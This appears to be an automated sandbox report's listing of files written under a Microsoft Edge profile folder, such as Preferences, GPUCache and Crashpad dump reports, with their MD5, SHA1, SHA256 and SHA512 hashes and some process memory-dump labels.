MD5 c5740e2cdce08e815b0fa146576b117a
SHA1 cd50fba2d6f8535471a4a08841967b8cd9d64c65
SHA256 08431aa71de8c862b4744bdddbf6a2505b2705a4589e82c482f606a26fc478fd
SHA512 873e93a005b5603a4a421522bce344b9dabc785f631912bf981e34695a0cf2195cc135811e4064bebcf954a01a4984706bf3d000d3f072fba322fe4a815129d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\warnStateCache

MD5 3f66f244278461dd07a3feb77a17712f
SHA1 8d570b550699ad0f248ec98b5d678f54248c0a84
SHA256 203ce5c7c1680c6e98f5ceca920e9d904122a9e26a743191e9b0fe1f6584ed60
SHA512 8d4733222e2e0bbc18370055d0602d0389e7a562887e97b2e54073017ffea024e9b1341ed95e28883861ef5e0d4fa9d27ed0894912ffe167632aed2e4cf53e7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\download_cache

MD5 24127606dac5cc6142848b0387a3afb6
SHA1 2dd825cba2ded5f73de2f70d3056764788d6b3cd
SHA256 7680b8117dce679eaf37a1c4670506fda78781cfcd994295b5108db18fbbc3a8
SHA512 0c37b62b580255716371554cd47a1d7aa15a92b5376ff66d42cacf1e2fd95c027e7f8781231c4b0d9ccc17521a94f1e719cfd2307853d6d7d72dd8155ba6868b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\History Provider Cache

MD5 a9851aa4c3c8af2d1bd8834201b2ba51
SHA1 fa95986f7ebfac4aab3b261d3ed0a21b142e91fc
SHA256 e708be5e34097c8b4b6ecb50ead7705843d0dc4b0779b95ef57073d80f36c191
SHA512 41a1b4d650ff55b164f3db02c8440f044c4ec31d8ddbbbf56195d4e27473c6b1379dfad3581e16429650e2364791f5c19aae723efc11986bb986ef262538b818

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG

MD5 a6041aabb50c61d0184525eb6e857854
SHA1 8cb3c553d5295cc88231a84a53efa8a9cd4ffb33
SHA256 13310a17a50eae1f5601edb9182029d4f848920e8bce3c15116d079865be941e
SHA512 ce6b561082104fb812dd7b791316682d70fce31c50432172b985f2ddcd41fbadd494b22868e8c5d13184c305f89adf535a58e73cac9600823436a7c4ea924119

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Local Storage\leveldb\LOG.old

MD5 d4039b185bc58feb09012f5ea6763ea6
SHA1 98b150d7b4964d087dccdce53b3cfd493e76c3bd
SHA256 16cdd538c97ac7d0c9a1f7731b672705f50399b09e7c03997d8db28fc00eaf25
SHA512 75c9c311b63103bf315ef3417e15c3bb3250078920f3bb3097612cda08a888f9ee6675d9552f3a42417e6fc8ad4f85dc8fc70b9b6b47350007cadd436c4fc23a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Top Sites

MD5 f44dc73f9788d3313e3e25140002587c
SHA1 5aec4edc356bc673cba64ff31148b934a41d44c4
SHA256 2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983
SHA512 e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\load_statistics.db

MD5 3321b02bc024fb5a6cd075375fbd8d03
SHA1 d6c82e943be01e8a3f558700f37ef0b4b2c6a97a
SHA256 1efcdd2c69107b34cf8636a3172323e4e879fcfaff009a000199423d9d9e3b45
SHA512 e052fb05e10b66f220b125b6352abe9afb0da6a1e90b9b18420d69ae3f7e38c1a261876330d8c8fe163c625881a59bf24123fcfb101ea540b6ecef1a7b16356d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\index

MD5 bdfb72631c3fc3f374d1606571688a74
SHA1 a3e6b8ada17f07d9e931eac1dbb1c574af5d1e0e
SHA256 40b064cf10a5f6bb65391d7cded1a4aa136d1bf6c7f92248448e214d0dd32880
SHA512 ed4d2fc5b8d38e181b1859e5655686e1adbfc6c5b9f5f1a9c890c44f4194fc4d66751bce598a698a4c293443b40d13cb2eb02c01096437f30166ab04c53bbf29

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\GPUCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\LOG

MD5 1508bb7b5f1227ffbde8d8a70bca5a7f
SHA1 c2a023847e1e34a3a49b7dc2b5a3d9da38759489
SHA256 1a6254cc6471ba03bea563c3eb0aba80e3684f66a259219c7be73fe8082fb0ac
SHA512 36dba24c2b1162c115186f05724c1563949c2f329931a87f984fd93d91a37490982661a00a3aa0c46b9cdaa8e15d44c328294a96797d91cf0b97f4dad110a82e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\LOG

MD5 2563390c4e4a8f22b14eaadba44d6b5c
SHA1 c06c4aff051fd1553fea171a16c3cd0b15d96b18
SHA256 0b048a07939da5c3e23d51bad663c9b36bc6e98c8d8733d01535c6d914e7b8b1
SHA512 eac36d2577d84cec7e8cead67f579044174d3a4db5dc105b0ebeab51396b31e63d2bb9deb825bced7b149bc0923f0cc4c604ab8c9315a558a4c5ab41d929f4dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\LOG

MD5 d898747688a407bad58761735576e28a
SHA1 20416f4cdded7fdc5ebc49dadc2d42c47a34b38a
SHA256 0319ceec36611642f05bf961e6d3e9c6d765e6e5dac4c34ed364993d1f3b28b1
SHA512 4ae1292ebe89b282aa64098575137de56fb0c74379b53cacca69b9263a11fc4fe6e0abe5ae46ab390fa8451b3c0905772582274e5ec9b166ebea22f8f626db23

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\shared_proto_db\metadata\000003.log

MD5 d21e0a58064b6969bbaa7cf6e1f3b2e6
SHA1 e9f658a210dc777cb83319b3d70988e2c50aa8e9
SHA256 abfbc1783fa7b03989bda76a6a28a89197dd91aeed2bf5c79c97ae15c432c68f
SHA512 3d8b3666feea739c485f6939938e047c98933336f5dfba68fe06f0605f7ccaa2218816a5f8fe55169f14bc22df55abba5adaccf07f3e29ce5f46e07c615ad9d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 a3d2cb34b8e4d37c05052761032168b5
SHA1 f77e227aa092d52595ff5a51ec7de4f39af55485
SHA256 0e9abbdf54b1eff6cb6b1c35b818c359f7c33c3f95a828909440b6787db4a74c
SHA512 92a7641d73cf67c31d70bbdbe1f62b391d6806ab8e4b82218de6679dc4dd930809aa83b90cd84fa6ecb438f2313fb2c4fde5aec3537f72ee8bd1b6ed8089ab60

memory/3828-291-0x0000000074FF0000-0x00000000757A0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17ef7bc2-fdbe-42b6-95d5-7488ca6d88d2.dmp

MD5 14160a0118ab6e69f2fe8cd53c4c474c
SHA1 73bf0a01af3d41f3174e96f676d036ebfacecbcb
SHA256 13524884118f6285d9c12e82b2ccfec6c7105ecaf6d8ae5e363dd79dcd1cdd0c
SHA512 a92d0ef8d491b16798bf8f9e05e7cb0d88049628b25890e9aee90b4b62562130069b4af1c5242a8298ca6d93963aad8cae3f3168687e4f183644da0b7bb3d85a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 7611406137724e7cec16c399c7c2f034
SHA1 a4b080c150fc8f1005d7756973b9ec32caa3f000
SHA256 cd99c23894b278e6976d200e92ce83211222f9bbfa145f12e36e4af939e919ae
SHA512 510154c0adcb00c1805b12c29c2e65c1ebfcc10d54920cfa4cc984c5eb95b20849788dca696017604c351302d098aa7c686e2ad88e33fa85585f7e85dbd2c2b1

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 4167b8538f98aa1b836ff976f80505d0
SHA1 c2a5afc3a0767674175ea3777273408689904d6c
SHA256 206e817fb53b656bd7dd333b810583bcb59579ee8d1b3f96cb74aa79446c0d71
SHA512 1d77feac2e8bcc579ba6bb3da5d21045ef5370273d23d0341bb7d93dd3fe88ab1780601cbe4f485ad4e8b134d3a396a7178c4a39f4fbcb895508ead964f38322

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b26ad9aa-3214-4a47-8290-0b3a03d52f43.dmp

MD5 44d18e42f1cc9954487f7177af98d673
SHA1 a9fd6836ae13429133b199becec052afebb3449c
SHA256 a666802e6834f4a59e7ef3bb3b29683826bb946b9f0f8eaefda1a153f21fb12e
SHA512 40d943a20db5c71a862c236fbe444170e93103ffd1ebb7dce1659079a58c29760b803de4b3d399adff928927412524fdd3f476e652b8749a683767848c62e8f0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\b7b5412c-0f31-4f68-b8d8-117c5a64cb06.dmp

MD5 3d0adcb22f223126fa908aab79e27e34
SHA1 e38c6b987d08716e228d597244e6b3bbe062cfe7
SHA256 0ea61e387861621e2d381771c03f1cc470892d2003f28af439f856fc7994575f
SHA512 6c2d157cce21df9465380b5d1606337bf06b9ab8aaf31b1e2f32b1c25308772c901d4ea5120fe8b150e417afd75aecb8cf065a9b1926a3a894cc18bfbd4c6c26

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 f35caa06e7b581d2eda3aecaa3e4d9f8
SHA1 757e6b167c5b86e48f2d792eac9acff085ab010e
SHA256 eafc63c4631f54dc53d6177c198f5624a241f5c9b65d6f8f2f406675b102fa64
SHA512 a71b014c9b3bf7b49f80ee48b164771da005f36bcef2cc9f73ed9123c07de0f9eeae6888556a60a87479cbeb847c902a69a38f13ccc76961b32a83e58551897b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\17c5331c-04e1-4394-bcf1-bc0f645a3a55.dmp

MD5 fccab65947dce323fdc2a9910af98143
SHA1 b3e71074ef7864965d563bd2a228e9231c2afc48
SHA256 d3526709aae4814b3999cda1ef36009db0d5597910719f12ca71abf5a0e61eb7
SHA512 8985986ed5c355f9a7a928166e4be0abe20cdb3acc1cfd4e11a9e886e39dc2e282674ecb8d2d363e4e8e35d684463d4f5cdec6372ec9ca11dc822d7a8072b328

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f2cad9a3-2f78-4692-bc1a-dccc604ddfcc.dmp

MD5 4cb967e03898a6a807f0b13eb006db08
SHA1 4f7245db20b731f1c1e2345087f9e96c90a41fc2
SHA256 3efb0b7421c80257b66ddb71f6beb17d5e757fd40556fadd1a6dcd72b8a2e7ae
SHA512 6748c8483e3c060c5a2f0652f1959c428a7f5c8ced99b005878a6f0efc69368d25ffa272ff1f272ac205a9ad7a65657d500b7bd4bceef22f8493c9c052158898

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\31db489b-e828-4397-823c-0d0102b33cef.dmp

MD5 9211e91210e00fa0f8b456127fd430eb
SHA1 be9bb1d2720e6d03cf235578d85fac78b0d6ba7e
SHA256 3878ebbd79eb7d95e79c82fdcb2d8f9959bead1a97f2f9dc022a25042810b125
SHA512 83a6a81641def9291b0aa22eef65155c389f1810efd2fb5648b654f56a2c42ab0b16bc44f408a97a2dea4594beb1d125f8edf7590403087a6b9a9fa26ddc0d19

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 30a55320b8595b3bbbf1d571f3e7de69
SHA1 c2c2b21dae6bbd9985be46c29cc20ae799a58b50
SHA256 0ed872a8f91315be9ea8cc0f19817fa70fc5341f485a3acfebc461fbf1cdc931
SHA512 203926e6259494d5229796db10e4e7e3369edae1bcbddc06b93f075d5f00a3386adb263fd3b39582dc3b360bc1b4db5c63e484f6d7e315b6395708fba8fa7faa

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\87f82129-5ead-48a2-b0e3-8ea1b8d6f770.dmp

MD5 7763c65e0a973272b61650031a5236f0
SHA1 fe28857f691b4934398eb6495c640b50cabf1bbb
SHA256 9fd990648970d76a44a12dabd80f693470b3fa3b7a6bc588ed3a2f4fb52f6de7
SHA512 d7857e5ad588b18d008718762173e34d0bf3ed29421ab6e01e5821b1e05a14857914b42ebb56cd3d323ca8e47600cff84363d726e8aa91a505d754ff66e66aac

memory/5112-630-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/5112-631-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 c1aed8f08c873369cd546cab9d570454
SHA1 e62b8e98afdfb08adbee89a27e2f06fdca58a42c
SHA256 5b944599eedeb3f2112b0826e1bab52bd28fc028bee19f47b3403557ad76ece6
SHA512 d003ada4a2baf5667f3ca13808f657ac5bc355905835e96a6d4645bb3c139d7f6c301c68b4e3a8629c511e9bd45246ac95382cf2437b7dbd8d79bec83ceafd8e

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\15bd52b7-d6ad-41f4-84b4-68f51e4ca23c.dmp

MD5 1a45b8f4d7a315274a3cf0afbcb1ba2f
SHA1 34db9e1e5e5d21543a17877bd122beb82fb85902
SHA256 329805f411c22d1509c685065bac8639f588550d0cbfd3350f1d7b254c331cd1
SHA512 dfbc3bdb8d64f06375ff84739da433c45534ae8b22cae24e7ab0858dd3c55442c08a428a250561afd476f7bb5da619ef153a82089be190f21f288b8c8ab7209d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 4e040cfba3922536fe11f5778a81d553
SHA1 e5e37b0afa0af2f9397a8ba1835af29b5fc8222f
SHA256 92ff1f292a6f3bdbe2fa32213f4d0083de920a02c80c142f26174cccf0fc6a59
SHA512 c3a627abe191c1b713ac956ca0aafbf9674cf57a1531889357e698661f784ce2723ba2cfeaaa893aaafb06b6a87e039f23f301befe62bb1939925008017fcc71

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\2e768fa3-656f-4694-9c33-65a719f69bc5.dmp

MD5 30c7f73799908750dd79bd9b010e153b
SHA1 7b9358263ed0502542f777a9c17bbbb06633b493
SHA256 0505d3ffea0c6e5ab86bcceaae9bdfd2c7446ba1cb9a6f53eb4f179cc6fc86bd
SHA512 8ce0a69aa3a0f99362760ea227d0aae219f466b9328c2adddbddebfe7cb7b0686ed2d197fe6cd3e693e531b6a1693c243fd2cfe9d53cdaf002ae2a8bf8de2c29

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\25b62285-fbe9-4e7e-b851-72c00e743c76.dmp

MD5 c8fe20d3faa55ddac0ac073b0a2b17fa
SHA1 ee56414654804465cf6ae30477b9564eb2869003
SHA256 bc7fa838563116d8599e405de8b4f447de0899b9d9a4c552afab27200ce36e36
SHA512 6614d9c9940e52fe93ecffc851d6cdfba975158525f35753b34526bf56d9559072572fff14b43c1c7dfbf22f5a92834c7b7fb9af1f39ab75ad9f2cf80e0f3aef

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 40058b362c5cc042b8ce03817ae3edd2
SHA1 7a9eaa50781b6b68150cc3da634c8a92e6692368
SHA256 04076c9c8e4b2fce6e2deddc444b13c8f3d477cc3a09fdfad05d0953b090bda6
SHA512 78fd298c7f7e1368a760fd23c95d449d7a16c48c63707d5b41aeb686c5afe5513b30479bd9c92799c5fa61e7a027c1d66b5a13aad7827e79008b5c2f3d3421ab

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\6885d9c7-2b7b-4d95-971b-ff6b17628fbf.dmp

MD5 210e7b0ae2a4a5471de1f04367158644
SHA1 d69f64028a5ec9e8ce9cff6a229680c32aae03a6
SHA256 ae774636ff633d3c8ab389575b1d060a65dfdbc6bb365c4e89c92bedaffdfd97
SHA512 5a6f1982b5eb95d28ebdff1570969eb2476322defc5978679693592fb9047678f4b081b83b208666f45126c839a342506aa306fb81acd12016b0c9475ebbff68

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\fcaf00fe-f577-43fd-81a0-1bd29d290296.dmp

MD5 c9ed7e9c49e675b171fc1315fc022484
SHA1 4d9ca86c7a7794513d040a1f5c177f702ed1f148
SHA256 e6df538e03ad9b0fd647434889f1508b844f479a68e288402b2871be7d933bf8
SHA512 10e28fde43453cbc923721601e56928e78c3390bfb59f6a26f161c79fd2d5570c3a3d2c28cd5e9e5a490382f3d3466a59f67004b53570effb0e81b4c2a9d0960

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\8bd30271-72d7-482b-87e5-9f5d415996d2.dmp

MD5 e1b505102a50d27a6742bbf5d5cb08f8
SHA1 3d884b1ccbae8a30a60f24676380ba43d78ff035
SHA256 37e1f5300c33a3fe314622e66fa561c021fe26e24d8ab055468b0f27413124c2
SHA512 d6eb7556356ea73c5d33d3ee38e1f8dfbe68c0153e4c8a032eda233d54b13c5cb5adf0f743d60c11d89d3d9ba8bb7eaffe95f1ec7ef3345812a2269f876828cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 30d66600cbfa55df84741cdbd74a0735
SHA1 7fc6f8280f376231745042023d24fa092de294b5
SHA256 8b8c6eedf92df6f758d11df89c4729c265afa24d75ddae844a1e6cb8066114cf
SHA512 4f96324808b576ea5de9ca5971de5f6e11c22e4b62fa6ed68668fbeac8a3f27d6187adfc8bed1e63d3ad8fc0bf9bc691018e4a4e95cd13d1c73f07eddad2d39f

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\609fd34d-2446-458d-8410-fd29da304fc7.dmp

MD5 653991917726c4de59b87cf9709312c2
SHA1 4b177da701a250463452bcd798ca95b25f7869d7
SHA256 f4acab86fe041bec239b0c83683f9b603549bd521d7ee57567143c9ea41d9f65
SHA512 84532a270418f2f324cfb876a36f542cd740c418999d6203acb2db571be5aa4e82eb7fe32fe30f8feb1785970584eed80f873de071ef54edc744c8fd9acca395

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 df194a1223745d5d84ac7a6960a19067
SHA1 19e8baa51d594b041f7178722420f49ed8f64ef4
SHA256 cd406d45d8d1208350b47abc25b065172d80f89e5518a77e28102f451dbb5944
SHA512 936c84f6affdd66da220c5773d8ab2e8cc6c7d06e4881568784351c5fa4d4c97cb3b0ed90fade45d0cc7dc44f33f24e643e12b8a841880d779f6dae8b85a440b

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\ed947f9c-5427-4219-b738-d5bb49f6fa2c.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

MD5 f0a9d790f792aa35198771f6ffe5e556
SHA1 4a088c4d77cb13371fcdadef016eb2a1583ba616
SHA256 bdc7d0db5cc98b6e9390280daa4013cfc33b2aae8c56a067c1880d1d01324cef
SHA512 da9c867dd716e963c121824e8d1e8f7ba936ab616d46fb12e650aec4c687b9945797e468b12787b8e74f438a89258c490cdc90fafb21668d7e45856c177e911c

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\89ad4e69-7639-498e-8873-bb36789ace18.dmp

MD5 e295726c174e230417abf2408d7002cb
SHA1 8dd0520a1fe3ee87cf6256b0ddcbe8d817d022ef
SHA256 bc95251d9237ee57c8efe4b6526447a59c66e103bac2f530ffec3d875ae4b970
SHA512 3bfa95aaf335059baffcd7f65872e49907f5ab12198acd154dbe080f370041fb6a0570aac6e112b66e52734ac506a987f0d7f0e0060b165a70c67d441ecd176a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 c4918acaa30d837846941e217208a81c
SHA1 48d7f1099153e8eb36522f53d7c3042f153f82c8
SHA256 512c7aab4c11214823fda4835f8346aa1aef9204d385990398295bf39905e797
SHA512 4c509110cc5e44c2edeeaf1d582da74fa4793d1210075cb5230c889fbb9fb31f6960a27321cf63578380a448607cb7a7d8a7df264e6137adcad6515fa8982c35

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\003464b0-e142-422d-a6c4-ebff6e932fd9.dmp

MD5 22b8b50dcd82e6b5d9f98d9243783c31
SHA1 8dd6ae2c64afed0a1effb384703bcb9956e6d8e4
SHA256 7ac1dab144af5a5dc372044dd46820ac0d5564571e9e91733b46c323772db6b2
SHA512 23096356faf9153f6358f894627a0d92b5842fc33dd0f98b52a8bcafd19e183ccfe521f9ca417824e70c13dd4a67e3e517e87a8a95de02b6aebc8eac7d7ba4e5

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\380fc30e-40e8-4f31-829b-902113d51c4b.dmp

MD5 21640e568e91fb3a2dabdaee43139c9d
SHA1 1684de28d18e176ed0ce51df2b558e0eee943fdc
SHA256 1f127a0889f8fd2049ef1cdbee116caf3513cd3e88bbd033a812a9220a642c90
SHA512 d781a2704b8452752d099cf58de86f13eb8894b8843c05a2f0b9d68c05892f9326313753e9a2359a28a502753a36501b079431f683604c7c282f34826e2f28ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 b8b5a82bb11c7e37586ae32b3a0a7a05
SHA1 4370efc5dd039435731ce7e28b35bf2581193cfe
SHA256 3b0ed1ce8f401b225c98fd07975e3d3ee12ec89318c15c0bb76b0a5ed536e402
SHA512 8bdc65cd04a98f356c844136b04c3c6ef76ae606fd46a9363ab4fa5a6a3eabe94d630a20d0e07f9f7540acb0428379197c01e50a05a4fdde3e124f7a23a6eca0

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\1aec9ba8-e99d-401d-9856-7a7139bc0c78.dmp

MD5 3fcb90e538e49ef43d15cf36cb991631
SHA1 579b81984eeb195b803d1492576c66f5722a92a0
SHA256 c32fca3e8f784f33a27bd166c85960dfe64b1fc8420a6a37cc95414c54231864
SHA512 66c41adf34d3c14a929ced409d2f85526d3195a0989cde8eeb6cb2004ce1962236b3658b23c2ec1d585086b73720670a47908046683b32b17b1e3b95a2bfef51

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\c4ac5f02-301c-43e3-b8aa-358f9927c2ae.dmp

MD5 1225130661ad94c066bb26d3738c9f7b
SHA1 eb26e16ae31de1807cbfa1873e4414e99e8ddafc
SHA256 2940d8ad8355d59684a8ae7cb21b6714370bdd386b437e847a82ce24f7de9bc7
SHA512 9f572e343e1e3ad8555f94e9af21b8c08093497f5ce336da3a4f11c287121c53d9aaec83f51f93c55cdbb05a967345450fedfb02f212f03a6847dfd9f1023400

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\settings.dat

MD5 e6259bec9ddac890d93d0dcdb3846aa1
SHA1 f21787df5203bb2f14064b21e14dbe02fad1ce11
SHA256 2810cba5fe2af27bba305565e2dccbc1fe7e13359200bc1642dda205e88bbf71
SHA512 8e463a9364146be67f2f901d8634c040734749992d928dfde42d8d28fad942d65bf20f814a38d3cfd1ed8ead230cb02d20061e8ebdcd20c141107e36868ee60c

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 c0363db7ce36ec6ef99b3f10d4dfe9f0
SHA1 6425ca80ea0ae40b57f483c171dde67e081c735d
SHA256 ac342bcf7c0913eae659b9f6b2e4f43b842d1f095acb116b2c1c3190ffd85b64
SHA512 819bc3ffb6bc43f3477d719bd164ef48fab27bef2b75b53ddd4b3f1fdeec0edbb4e5e10521bb9fcf51b6fdd0564201f61419246519cef0c15e22ba47c88fd5d3

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\292d474a-9377-497a-b1c1-10b25edddadc.dmp

MD5 a1fe49acdf18bf5cb1cc4df611c1fa71
SHA1 a721bb36ce5942522a38ef4a81f74e6a38f66f01
SHA256 0749ad1121737c7947142a5ccb4f4a4f3481ecc961287f999799bcc46b1dc381
SHA512 544064c9b0456b70250d6bcb44f75788eacd05199d9d38006f65d8e6eb693d478f5778b3127123c57143778b887f85377c981cde4a1381d050e6672101b6cf7d

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 b5199c84d54b14f14b4d8351e7ad58be
SHA1 88f9b003dc9f2990ef3d3ea99551745219fa6b1d
SHA256 67fb156f15b8a1fb8cf6be5d00f357aa471c09ff0d691b9f1495290197193891
SHA512 618a27bbcd14343df0260e8b282144ae6cb7b39290011ab315c43ffe54f08c3c58243da233b7fcb4196dd6d36be7fd8a61f7c36ca07cfb0484939c575aa60a5a

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\f3afa200-2d28-4dd8-aa41-4893f6971d8a.dmp

MD5 265a35fa87ac821d36bc102f458aafee
SHA1 007546a2f2ef9495709ccb20c1f1236e77a30cf4
SHA256 f83824f535a04a726989ab65efcdedfe5e38e390e5aabf3c9c18944d63228b21
SHA512 c44bd04f913d135670f18154c3f62ad1a88cd29ff15d6b5aef2ada17f2e16a423a7050cfc51b14c72302d94e8814ab9831d8c645f8cf8c17631352cf9e08b4a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\metadata

MD5 6908d6ad9a79b5480ee1c18bb13826a1
SHA1 9cead42c7042ccabbd28c803c82df98d5e45797d
SHA256 a03adca87e4a8a1a69209d0780c5055996de1b6f1797cc6913c6926613a34beb
SHA512 4d23dd20676f9fa5c4db7af0edcdcedafb607492dbc12df65733ccf02166df08e00c42c922f15c2093d71405d2f7d773d2d95386c2d37b7f81651497e27d6e87

C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad\reports\7706fb13-207f-4d70-b6fa-25e1450a5d12.dmp

MD5 574f33f58a9e51459803127a22bb36f6
SHA1 b6ece21c6ca0b286e858d6229edae9dd0826b49d
SHA256 abe711f4c64822997c4c00a4223086ceae2a0d628bcc43ede6c7d5602b728e85
SHA512 de3ee7b91e88c1e30b71dd4092b697a5ca1e1420168e3b9229a4679090ca3ede8dcbf323bb4c1684cb483c93752db907d2f981e644c4f2027688ced32fd8bfef

memory/3828-1377-0x0000000074FF0000-0x00000000757A0000-memory.dmp

memory/1552-1380-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/1552-1381-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/392-1382-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/392-1383-0x00007FF8665B0000-0x00007FF867071000-memory.dmp

memory/4404-1384-0x000000001B490000-0x000000001B49E000-memory.dmp